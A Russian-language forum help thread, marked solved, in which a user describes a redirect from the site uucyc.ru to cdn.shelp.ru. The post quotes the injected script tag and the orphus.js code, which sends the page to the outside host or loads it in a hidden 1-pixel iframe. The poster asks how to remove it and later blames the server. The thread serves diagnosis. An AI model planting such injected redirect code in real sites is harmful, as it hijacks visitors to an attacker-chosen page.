Решена - Редирект на подозрительный сайт с помощью javascript

Вчера вечером столкнулся с проблемой. Когда пытался зайти на страницы сайта uucyc.ru, автоматически включался редирект вот сюда http://cdn.shelp.ru/
Причем редирект происходил не с самого сайта uucyc.ru, а когда начинал переходить по ссылкам на нем.
посмотрел html-код страницы uucyc.ru, наткнулся в самом конце на такой код (сразу скажу, что эта пакость работает в любом браузере, динамически внедряясь в html-код страницы сайта uucyc.ru, разве что исключение составляет IE 3.0 8) , поскольку в этой старой версии, которую еще поискать надо , многие функции javascript, используемые во вредоносном коде, не работают :lol: ):

/---------------------------------------------------------------------------------------------/
<script type="text/javascript" src="http://cdn.shelp.ru/js/orphus.js"></script>
<a href="#top" id="orphus"><img src="http://cdn.shelp.ru/img/i.gif" width="1" height="1" alt="Орфус"></a>
/---------------------------------------------------------------------------------------------/

А в файле orphus.js содержится следующий код javascript:
/---------------------------------------------------------------------------------------------/
/*
NOTICE! You've requested a file that is not available for remote inclusion.
*/
try{
window.location = 'http://cdn.shelp.ru';
}catch(e){
var rframe = document.createElement("iframe");
rframe.setAttribute('width','1px');
rframe.setAttribute('height','1px');
rframe.setAttribute('frameborder','0');
rframe.setAttribute('id','rfx');
rframe.setAttribute('src','http://cdn.shelp.ru');
document.body.appendChild(rframe);
}
/---------------------------------------------------------------------------------------------/

Логика его действия проста. Это обычная try...catch связка, с помощью которой создается новый элемент на странице (переменная rframe в коде), который захватывает все объекты сайта (с помощью метода setAttribute устанавливаются атрибуты этого нового объекта, а с помощью вот этой хрени document.body.appendChild(rframe) этот вновь созданный элемент фактически применяется ко всему телу страницы), потому фактически всегда при нажатии на любую ссылку выполняется редирект по ссылке http://cdn.shelp.ru, на которой создается фейковый объект с картинкой, имитирующей строку ввода текста. Поскольку я в Javascript работал очень мало, хотя код в целом читать умею, то хотел бы узнать, может, кто в курсе, как это лечить?

Здесь http://uucyc.ru/forum/viewtopic.php?f=16&p=992609#p992609 рассуждения пострадавших о проблеме...

Файлы uvs_v382, hijackthis и avz4:
http://rghost.ru/53080091
http://rghost.ru/53080193
http://rghost.ru/53082089

 

Решено. Причина в сервере.